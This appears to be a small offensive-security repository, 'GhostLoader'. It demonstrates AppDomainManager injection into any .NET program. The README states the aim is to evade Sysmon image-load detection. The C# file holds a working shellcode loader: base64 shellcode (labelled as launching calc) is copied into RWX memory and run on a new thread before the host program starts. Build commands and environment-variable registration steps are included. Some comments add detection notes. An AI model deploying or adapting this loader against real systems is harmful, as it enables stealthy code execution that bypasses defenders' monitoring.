├── README.md
├── filehistory.exe.config
└── uevmonitor.cs
/README.md:
--------------------------------------------------------------------------------
1 | # GhostLoader
2 | GhostLoader - AppDomainManager - Injection - 攻壳机动队
3 |
4 |
5 |
6 | GhostLoader Steps :)
7 |
8 |
9 | ```
10 | 1. Create C:\Tools
11 | 2. Copy some .NET binary (any .NET binary will do) to C:\Tools
12 | 3. In this example, we use FileHistory.exe, but any .NET app will do.
13 | 4. Ensure FileHistory.exe.config is in the same path
14 | 5. Execute C:\Tools\FileHistory.exe
15 |
16 | Does your tool/product detect/observe the Image Load Event?
17 |
18 | The purpose of this example is to demonstrate a way to circumvent tools that catch/prevent ImageLoad events.
19 |
20 | ```
21 |
22 | This should evade [Sysmon Event ID 7](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#events)
23 |
24 | ```
25 | Event ID 7: Image loaded
26 | The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be
27 | configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The
28 | signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event
29 | should be configured carefully, as monitoring all image load events will generate a large number of events.
30 | ```
31 |
--------------------------------------------------------------------------------
/filehistory.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/uevmonitor.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.EnterpriseServices;
3 | using System.Runtime.InteropServices;
4 |
5 |
public sealed class MyAppDomainManager : AppDomainManager
{
    // Called by the runtime while it creates the AppDomain for the host process, i.e. before the
    // host's own Main runs, because this type has been registered as the AppDomainManager
    // (through the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment variables or the
    // host's .exe.config, see the comment block at the end of this file).
    // appDomainInfo: setup information for the new domain; not used by this override.
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        // A breakpoint here, with the stack dumped, lands inside System.AppDomain.CreateAppDomainManager().
        System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");

        // A manager has far more control than is used here (ApplicationBase, overriding the
        // assembly resolver, ...). From a detection standpoint the registration artefacts
        // (those environment variables or config keys on a process) and a managed DLL that
        // runs before the host's entry point are what to look for, independent of any
        // image-load logging.
        ClassExample.Execute();
    }
}
22 |
public class ClassExample
{
    // Named equivalents of the literal flags passed to VirtualAlloc in Execute().
    //private static UInt32 MEM_COMMIT = 0x1000;
    //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    // kernel32 P/Invoke declarations. The pointer-sized arguments (lpStartAddr,
    // lpThreadAttributes) are declared as UInt32; only 0 is ever passed for them below.
    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        IntPtr lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
    );

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
    );

    // Copies an embedded byte blob into freshly committed RWX memory, starts a native thread
    // at its first byte and blocks until that thread exits. Always returns true: neither the
    // VirtualAlloc nor the CreateThread result is checked, so a failed allocation would most
    // likely surface as an exception from Marshal.Copy rather than as a false return.
    // Detection notes: this is the VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE) -> copy ->
    // CreateThread sequence. A private RWX region and a thread whose start address is not
    // backed by any module on disk are the observable artefacts, and they appear in the host
    // process whether or not the managed DLL's image load was logged.
    public static bool Execute()
    {
        // x64 Calc Shellcode Example
        // (the label above is the author's; the blob is not interpreted here)
        byte[] installercode = System.Convert.FromBase64String("/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=");

        // 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE (see the commented constants above);
        // the region is writable and executable at the same time.
        IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
        Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;
        IntPtr pinfo = IntPtr.Zero;
        // New thread starts directly at the copied bytes (no parameter, no creation flags).
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        // 0xFFFFFFFF is INFINITE: the caller (and so the host's startup) is held until the
        // injected thread finishes.
        WaitForSingleObject(hThread, 0xFFFFFFFF);
        return true;
    }
}
60 |
61 | /*
62 | // uevmonitor.dll and path are _completely_ arbitrary here, as is the use of FileHistory.
63 | // This should work with any .NET app
64 |
65 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:uevmonitor.dll type.cs
66 | set APPDOMAIN_MANAGER_ASM=uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
67 | set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
68 | set COMPLUS_Version=v4.0.30319
69 |
70 | Or Config File
71 |
72 | // Copy FileHistory.exe to C:\Tools\FileHistory.exe
73 | // Copy Config Below to C:\Tools\FileHistory.exe.config
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 | */
90 |
91 |
--------------------------------------------------------------------------------